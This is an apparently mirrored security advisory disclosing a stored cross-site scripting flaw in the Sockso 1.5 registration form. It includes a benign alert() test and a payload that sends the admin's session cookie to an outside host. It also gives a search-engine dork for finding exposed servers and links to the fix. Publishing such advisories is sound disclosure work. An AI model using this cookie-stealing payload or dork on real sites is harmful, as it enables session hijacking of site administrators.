Sockso 1.51 Cross Site Scripting

2012.05.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

####################################################################### Application: Sockso http://sockso.pu-gh.com Versions: <= 1.5 Platforms: Windows, Mac, Linux Bug: Persistant XSS Exploitation: remote Date: 11 May 2012. Author: Ciaran McNally Web: http://smwyg.com/blog/#sockso-persistant-xss-attack Google Dork: inurl:"4444" sockso ####################################################################### 1) Bug. 2) The exploit. 3) Fix. ####################################################################### Sockso is a free, open-source, personal music host server for everyone! It's designed to be as simple as possible so that anyone with a mouse and some mp3's can get their friends listening to their music across the internet in seconds!" ####################################################################### ====== 1) Bug ====== On Registration page (normally @ "4444/user/register") the username input is never sanitized. This is then stored in the database of users and displayed in the admin panel & user pages. ####################################################################### ============== 2) The exploit ============== Using a username value of... <script>alert('xss');</script> Or the admin cookie session can also be retrieved by using... <script >new Image().src="bleh.com/xss.php?c="+encodeURI(document.cookie)</script> ####################################################################### ====== 3) Fix ====== https://github.com/rodnaph/sockso/pull/99/files #######################################################################

References:

http://smwyg.com/blog/#sockso-persistant-xss-attack


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top